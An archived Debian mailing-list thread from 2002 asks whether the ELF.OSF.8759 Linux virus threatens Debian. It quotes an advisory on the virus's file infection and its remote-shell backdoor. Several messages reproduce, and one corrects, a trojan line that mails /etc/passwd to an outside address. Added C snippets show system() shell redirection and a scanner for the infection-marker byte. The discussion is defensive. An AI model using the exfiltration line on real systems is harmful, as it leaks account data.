Re: does virus ELF.OSF.8759 affect debian?
On Thu, Apr 18, 2002 at 11:02:12AM +1200, Tim Nicholas wrote:
> I think he is saying that it should be something more like
>
>   system("mail [EMAIL PROTECTED] < /etc/passwd");
>
> But since I don't really know C, you might not be able to use '<' in
> system calls... it seems likely though. The previous version would try
> to email user /etc/passwd.

For the record, system(3)'s manpage states:

  system() executes a command specified in string by calling
  /bin/sh -c string

The string you pass to system() is given as a single argument to the shell, so you can do anything and everything. I think we all get the point :)

--
#define X(x,y) x##y
Peter Cordes ; e-mail: X([EMAIL PROTECTED] , ns.ca)

"The gods confound the man who first found out how to distinguish the hours! Confound him, too, who in this place set up a sundial, to cut and hack my day so wretchedly into small pieces!" -- Plautus, 200 BCE

-- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
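As an added illustration of the system(3) behaviour quoted above (not code from the thread), the C program below runs two commands of the shape `prog WORD1 < WORD2` through /bin/sh -c and shows that the shell, not the program, opens the word after `<`; when that word names no file, the program never starts. The `show` shell function, the sample file under /tmp and `nobody@example.invalid` are constructed stand-ins.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Harmless stand-in for a program such as a mailer (constructed for this
 * example): prints its first argument, then copies its standard input.
 * "%%s" becomes "%s" once snprintf() has built the command string. */
#define SHOW_FN "show() { printf 'arg=%%s stdin=' \"$1\"; cat; }; "

/* Run `show ARG < WORD` through popen(3), which, like system(3), passes the
 * whole string to /bin/sh -c. Captures stdout; returns the shell's exit
 * status, or -1 if it did not exit normally. Only the constructed values
 * below are passed in, so the words are not quoted. */
int run_show(const char *arg, const char *word, char *out, size_t outlen)
{
    char cmd[512];
    snprintf(cmd, sizeof cmd, SHOW_FN "{ show %s < %s; } 2>/dev/null",
             arg, word);
    FILE *p = popen(cmd, "r");
    if (!p)
        return -1;
    size_t n = fread(out, 1, outlen - 1, p);
    out[n] = '\0';
    int rc = pclose(p);
    return (rc != -1 && WIFEXITED(rc)) ? WEXITSTATUS(rc) : -1;
}

/* Write a constructed sample file under /tmp; its name is returned in path. */
int make_sample(char *path, size_t pathlen, const char *content)
{
    snprintf(path, pathlen, "/tmp/sysdemoXXXXXX");
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    ssize_t w = write(fd, content, strlen(content));
    close(fd);
    return w == (ssize_t)strlen(content) ? 0 : -1;
}

int main(void)
{
    char file[64], out[256];
    if (make_sample(file, sizeof file, "sample-data") != 0)
        return 1;

    /* Path as the argument, a word that names no file after '<':
     * the shell cannot open it, so `show` is never started. */
    int st = run_show(file, "nobody@example.invalid", out, sizeof out);
    printf("path < word : status=%d output=\"%s\"\n", st, out);

    /* Word as the argument, path after '<': the shell opens the file and
     * the program reads its contents on standard input. */
    st = run_show("nobody@example.invalid", file, out, sizeof out);
    printf("word < path : status=%d output=\"%s\"\n", st, out);

    unlink(file);
    return 0;
}
```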
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 17, 2002 at 12:13:46PM +0300, Jussi Ekholm wrote:
> Anne Carasik [EMAIL PROTECTED] wrote:
> > Compile from source is a good idea too. It's amazing what you can
> > find in the source. I found a couple of stupid Trojans that way.
> >
> >   system("mail /etc/passwd < [EMAIL PROTECTED]");
>
> Oh shit, that's evil. Where did you manage a software including this
> kind of source code in the first place? Don't say freshmeat.net! Or
> sourceforge.net... I'm glad you were able to detect this and not run
> the software.

I can't remember, other than some obviously suspect code. It was an ssh trojan, if I remember correctly.

> Big sigh, indeed. I hate these script kiddies, crackers and people who
> only do harm to other people online. Was it a take-over of an IRC
> channel, breaking into someone's system or whatever. I just hate these
> people. I've never seen computer, internet connection and everything
> related as tools to cause harm and destruction. It's beyond me what
> satisfaction these persons get...

I don't think they have anything better to do (at least the script kiddies). Some groups, like in the Middle East and China, feel that they have a sudden interest in attacking US sites. However, I'm sure there are other groups attacking the Middle East and China as well.

You should see some of the stupid stuff script kiddies leave on the systems--they don't even change the mtime or the logs, not to mention leave the code behind with URLs in it.

-Anne
--
Anne Carasik, System Administrator
[EMAIL PROTECTED]
Center for Advanced Computing Research
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 17, 2002 at 03:31:17PM -0700, Anne Carasik wrote:
> On Wed, Apr 17, 2002 at 05:06:03PM -0500, Bryan Andersen wrote:
> > > Compile from source is a good idea too. It's amazing what you can
> > > find in the source. I found a couple of stupid Trojans that way.
> > >
> > >   system("mail /etc/passwd < [EMAIL PROTECTED]");
> >
> > Yeh, and it's buggy too. Take a close look at what really happens.
>
> I'm sure it is. [EMAIL PROTECTED] doesn't exist. ;) Seriously, I know
> it is. The other thing is, I use shadow most of the time. Still, the
> username information is never a good thing to share.

I think he is saying that it should be something more like

  system("mail [EMAIL PROTECTED] < /etc/passwd");

But since I don't really know C, you might not be able to use '<' in system calls... it seems likely though. The previous version would try to email user /etc/passwd.

Tim
--
Tim Nicholas || Cilix
Email: [EMAIL PROTECTED] || ICQ# 15869961
http://tim.nicholas.net.nz/ || Dunedin, New Zealand
Grow up, Larry. You give me too much credit. - Linus Torvalds
Re: does virus ELF.OSF.8759 affect debian?
Anne Carasik [EMAIL PROTECTED] wrote:
> Compile from source is a good idea too. It's amazing what you can find
> in the source. I found a couple of stupid Trojans that way.
>
>   system("mail /etc/passwd < [EMAIL PROTECTED]");

Oh shit, that's evil. Where did you manage a software including this kind of source code in the first place? Don't say freshmeat.net! Or sourceforge.net... I'm glad you were able to detect this and not run the software.

> *sigh*

Big sigh, indeed. I hate these script kiddies, crackers and people who only do harm to other people online. Was it a take-over of an IRC channel, breaking into someone's system or whatever. I just hate these people. I've never seen computer, internet connection and everything related as tools to cause harm and destruction. It's beyond me what satisfaction these persons get...

--
Jussi Ekholm [EMAIL PROTECTED] | registered Linux user #269376
http://erppimaa.cjb.net/~ekhowl/ | UIN (ICQ): 156057281
ekh @ IRCNet | GnuPG Public Key ID: 1410081E
Re: does virus ELF.OSF.8759 affect debian?
Anne Carasik wrote:
> On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote:
> > And another reason not to run as root...
>
> Compile from source is a good idea too. It's amazing what you can find
> in the source. I found a couple of stupid Trojans that way.
>
>   system("mail /etc/passwd < [EMAIL PROTECTED]");

Yeh, and it's buggy too. Take a close look at what really happens.

--
Bryan Andersen | [EMAIL PROTECTED] | http://www.nerdvest.com
Buzzwords are like annoying little flies that deserve to be swatted.
Linux, the OS Microsoft doesn't want you to know about..
-Bryan Andersen
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 17, 2002 at 05:06:03PM -0500, Bryan Andersen wrote:
> > Compile from source is a good idea too. It's amazing what you can
> > find in the source. I found a couple of stupid Trojans that way.
> >
> >   system("mail /etc/passwd < [EMAIL PROTECTED]");
>
> Yeh, and it's buggy too. Take a close look at what really happens.

I'm sure it is. [EMAIL PROTECTED] doesn't exist. ;)

Seriously, I know it is. The other thing is, I use shadow most of the time. Still, the username information is never a good thing to share.

-Anne
--
Anne Carasik, System Administrator
[EMAIL PROTECTED]
Center for Advanced Computing Research
does virus ELF.OSF.8759 affect debian?
Hi there!

I've read a strange info at http://www3.ca.com/Virus/Virus.asp?ID=11513

is it true? can it infect my debian systems? (woody, sid, potato)? how?

thanks

ELF.OSF.8759
Alias: Linux.Osf.8759
Category: UNIX/Linux
Type: Virus
Wild:
Destructiveness:
Pervasiveness:

CHARACTERISTICS

OSF.8759 is a Linux virus infecting ELF executable programs. OSF consists of two quite distinct parts: a viral part and a backdoor part.

The virus checks if its code is executed under the debugger and if so, it skips the file infection routine altogether. This routine is also avoided if the infected file is executed from the /proc or /dev directories. Otherwise, it infects up to 201 files in the current directory as well as up to 201 files in the /bin directory. The virus avoids infecting the "ps" program (and all programs with names ending with the string "ps"). Infected files increase their size by 8759 bytes. The virus marks all infected programs by setting a value of the byte at offset 0x0A to 2.

The backdoor procedure establishes a server listening on port 3049 (or higher). Depending on the contents of packets received from a client OSF may present a remote user with an interactive shell or execute commands on a local system using the syntax: "/bin/sh -c command".

- Narancs v1
IT Security Administrator
Warning: This is a really short .sig!
Vigyazat: ez egy nagyon rovid szig!
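The advisory quoted in this post gives one concrete marker: infected ELF files have the byte at offset 0x0A set to 2. The C program below is an added example, not code from the advisory or the thread, that checks that byte in every regular file of the two locations the advisory names (the current directory and /bin, or the directories given as arguments). The function and enum names are made up here, and a set byte is only a reason to look closer, not proof of infection.

```c
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

/* Marker from the advisory: infected files have byte 0x0A set to 2. That
 * offset lies in the e_ident padding of an ELF header, normally zero. */
#define OSF_MARK_OFFSET 0x0A
#define OSF_MARK_VALUE  2
enum osf_result { OSF_ERROR = -1, OSF_NOT_ELF, OSF_UNMARKED, OSF_MARKED };

/* Classify the first len bytes of a file. */
enum osf_result osf_check_header(const unsigned char *hdr, size_t len)
{
    static const unsigned char magic[4] = { 0x7f, 'E', 'L', 'F' };
    if (len <= OSF_MARK_OFFSET || memcmp(hdr, magic, sizeof magic) != 0)
        return OSF_NOT_ELF;
    return hdr[OSF_MARK_OFFSET] == OSF_MARK_VALUE ? OSF_MARKED : OSF_UNMARKED;
}

/* Check one path; only regular files are opened. */
enum osf_result osf_check_file(const char *path)
{
    unsigned char hdr[16];
    struct stat st;
    FILE *f;
    if (stat(path, &st) != 0 || !S_ISREG(st.st_mode))
        return OSF_NOT_ELF;              /* missing or not a regular file */
    if ((f = fopen(path, "rb")) == NULL)
        return OSF_ERROR;                /* unreadable: report separately */
    size_t n = fread(hdr, 1, sizeof hdr, f);
    fclose(f);
    return osf_check_header(hdr, n);
}

/* Scan one directory (not recursive); return marked-file count, -1 on error. */
int osf_scan_dir(const char *dir)
{
    char path[4096];
    struct dirent *e;
    int hits = 0;
    DIR *d = opendir(dir);
    if (!d)
        return -1;
    while ((e = readdir(d)) != NULL) {
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        if (osf_check_file(path) == OSF_MARKED) {
            printf("marker byte set: %s\n", path);
            hits++;
        }
    }
    closedir(d);
    return hits;
}

int main(int argc, char **argv)
{
    const char *defaults[] = { ".", "/bin" };  /* locations the advisory names */
    int total = 0, count = argc > 1 ? argc - 1 : 2;
    for (int i = 0; i < count; i++) {
        int n = osf_scan_dir(argc > 1 ? argv[i + 1] : defaults[i]);
        total += n > 0 ? n : 0;
    }
    printf("%d file(s) with the marker byte set\n", total);
    return total ? 1 : 0;
}
```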
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote:
> Hi there!
>
> I've read a strange info at http://www3.ca.com/Virus/Virus.asp?ID=11513
>
> is it true? can it infect my debian systems? (woody, sid, potato)? how?

If you run an infected file - yes. Otherwise - I don't think so (they don't say if it exploits any vulnerabilities other than user's stupidity/ignorance).

Basically, if you run binaries from an unsafe source, you get what you deserve.

Marcin
--
Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/
GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 07:46:22PM +0200, Marcin Owsiany wrote:
> On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote:
> > Hi there!
> >
> > I've read a strange info at http://www3.ca.com/Virus/Virus.asp?ID=11513
> >
> > is it true? can it infect my debian systems? (woody, sid, potato)? how?
>
> If you run an infected file - yes. Otherwise - I don't think so (they
> don't say if it exploits any vulnerabilities other than user's
> stupidity/ignorance).
>
> Basically, if you run binaries from an unsafe source, you get what you
> deserve.

And another reason not to run as root...

-B
--
Brandon High [EMAIL PROTECTED]
'98 Kawi ZX-7R Wasabi, '98 Kawi EX500 Harlot, '94 BMW K75s Brick
When approaching a four-way stop, the vehicle with the largest tires always has the right of way.
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote:
> And another reason not to run as root...

Compile from source is a good idea too. It's amazing what you can find in the source. I found a couple of stupid Trojans that way.

  system("mail /etc/passwd < [EMAIL PROTECTED]");

*sigh*

-Anne
--
Anne Carasik, System Administrator
[EMAIL PROTECTED]
Center for Advanced Computing Research
Re: does virus ELF.OSF.8759 affect debian?
wow, that's bad! where did you find that evil code?

jmb

At 02:44 PM 4/10/02 -0700, Anne Carasik wrote:
> On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote:
> > And another reason not to run as root...
>
> Compile from source is a good idea too. It's amazing what you can find
> in the source. I found a couple of stupid Trojans that way.
>
>   system("mail /etc/passwd < [EMAIL PROTECTED]");
>
> *sigh*
>
> -Anne
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 05:46:24PM -0400, Dominique Fortier wrote:
> > Basically, if you run binaries from an unsafe source, you get what
> > you deserve.
>
> Man, I try to be an honest individual, I hope I don't deserve something
> like that! ..., Is there such a thing as a 100% safe source for
> binaries?

Check the PGP key (or GnuPG key) and the md5 checksum from the source (as long as you trust the source). Even trusted sources (like ftp.porcupine.org/pub/security) get hit with Trojan horses. Always check the digital signatures and the checksums!

Debian does this when you do an apt-get, I believe.

-Anne
--
Anne Carasik, System Administrator
[EMAIL PROTECTED]
Center for Advanced Computing Research
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 02:54:26PM -0700, Anne Carasik wrote:
> with Trojan horses. Always check the digital signatures and the
> checksums! Debian does this when you do an apt-get, I believe.

I think there's support for it in later versions of apt-get, but not with the one included with Potato.

-B
--
Brandon High [EMAIL PROTECTED]
'98 Kawi ZX-7R Wasabi, '98 Kawi EX500 Harlot, '94 BMW K75s Brick
Speeling mistakes only bother people who are illiterate.
Re: does virus ELF.OSF.8759 affect debian?
On Wed, 2002-04-10 at 13:46, Marcin Owsiany wrote:
> On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote:
> > Hi there!
> >
> > I've read a strange info at http://www3.ca.com/Virus/Virus.asp?ID=11513
> >
> > is it true? can it infect my debian systems? (woody, sid, potato)? how?
>
> If you run an infected file - yes. Otherwise - I don't think so (they
> don't say if it exploits any vulnerabilities other than user's
> stupidity/ignorance).
>
> Basically, if you run binaries from an unsafe source, you get what you
> deserve.

Man, I try to be an honest individual, I hope I don't deserve something like that! ..., Is there such a thing as a 100% safe source for binaries?

> Marcin
> --
> Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/
> GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216